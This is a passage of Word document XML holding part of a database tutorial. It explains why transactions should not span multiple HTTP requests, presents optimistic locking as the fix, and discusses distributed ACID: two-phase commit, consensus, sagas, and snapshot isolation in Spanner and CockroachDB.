      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60232A13" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Anti-pattern: transaction spans multiple HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011FB2F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="0CDE2394" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Request 1: GET /orders/draft (BEGIN, read draft, keep connection/transaction open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41078EA7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Request 2: POST /orders/draft/items (add items to draft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F864BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Request 3: POST /orders/draft/submit (submit order, COMMIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293DE98D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="47358ADB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1CDC15" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction held open for seconds to minutes (user thinks, fills form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33FA61" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Locks held during this time (FOR UPDATE on draft order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271932AE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Connection occupied → connection pool depleted under load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA1614" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  User closes browser → transaction never committed → locks held until timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EDC113" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1114DE81" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Solution: optimistic locking, not long transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8C437" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="2D7C6B84" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Request 1: GET /orders/draft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19357242" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Read draft order → return {order_data, version: 5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D1682" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  No transaction or immediately committed read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E054C79" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53903A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Request 2: POST /orders/draft/items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD0EBD8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  BEGIN; UPDATE draft WHERE version = 5; COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F49117" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Short transaction, immediately committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EEE1C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Return: {order_data, version: 6}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B157F9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5288E751" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Request 3: POST /orders/draft/submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EE291" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  BEGIN; SELECT FOR UPDATE; validate; INSERT order; DELETE draft; COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E6D434" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Short transaction, immediately committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267AE94" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA11585" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Pattern: transactions last milliseconds (not seconds/minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C35A2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         State carried in response body (version numbers), not database locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05670F12" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="7E444FC0">
          <v:rect id="_x0000_i6775" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9EB4C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. ACID in Distributed Systems — The CAP Trade-off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084A092" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When ACID Breaks Across Multiple Nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10D256" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F620A28" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Single-node ACID is "solved":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C5D00" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  One machine, one database engine, one WAL, one lock manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F892E2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  All four properties achievable simultaneously with well-understood mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12279F54" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151807F9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Distributed ACID is the hard problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6A69C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Multiple machines, each with their own WAL and lock manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72628FA0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Network connects them — network can fail, delay, partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CEEFA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8BE6B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>Atomicity across nodes (distributed transactions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DE14A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Two-Phase Commit (2PC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588CC98" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Coordinator: sends PREPARE to all participants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DAEAD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Participants: write prepared state to local WAL, respond PREPARED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C2D2F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Coordinator: if all PREPARED → send COMMIT → all commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223A5A4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Coordinator: if any FAILED → send ABORT → all abort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C967DF6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B2A1A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Durability: coordinator writes decision to its WAL before phase 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AD1DA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Recovery: after crash, coordinator re-sends decision to participants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191910E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28769F7A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Problem: coordinator failure after PREPARE but before COMMIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D0D98B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      All participants are "in doubt" — they prepared but don't know decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C369B9E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Locks held indefinitely (prepared state holds locks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCA204" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      System blocked until coordinator recovers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E02DF8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E507DFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  This is the fundamental problem: 2PC is blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FDB577" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Coordinator failure → participants blocked indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027614E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    In asynchronous system: cannot tell if coordinator crashed or is slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CCEDB0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC758A0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FA3E2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    3PC (Three-Phase Commit): adds pre-commit phase to reduce blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5EB998" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Still has cases requiring blocking (network partition during any phase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3302C14E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE92F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Paxos/Raft consensus: replicate coordinator state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29181DF0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Coordinator crash → new coordinator elected → continues protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4159BB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      This is what modern distributed databases (CockroachDB, Spanner) do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C10BB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BABFCF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Saga pattern: avoid distributed transactions entirely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D34FF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Break transaction into sequence of local transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC721CF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Each step publishes event, triggers next step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568CFC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Compensation: if step fails, undo previous steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6D284" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Trade: no atomicity guarantee (intermediate states visible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6DCA8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              eventual consistency (not immediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047BF68C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="22AE0059" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Isolation across nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850259C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Distributed Read Committed: achievable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF8BE5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read from any node's committed state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206688D7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C5FDF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Distributed Repeatable Read / Snapshot Isolation: requires coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216B797" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Each node must agree on a consistent "snapshot point"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8E03ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F39A6C3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Google Spanner: TrueTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF76DC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Globally synchronized clocks with bounded uncertainty (1-7ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F9EAD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Timestamp = TT.now().latest (after waiting out uncertainty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B73B00" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      All reads at that timestamp are consistent globally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F350F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078353EC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CockroachDB: hybrid logical clocks (HLC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437458C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Logical clock + wall clock hybrid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6773EA44" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Read timestamps assigned to provide consistent global snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF2DCF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD48BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Distributed Serializability: expensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669CAC77" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
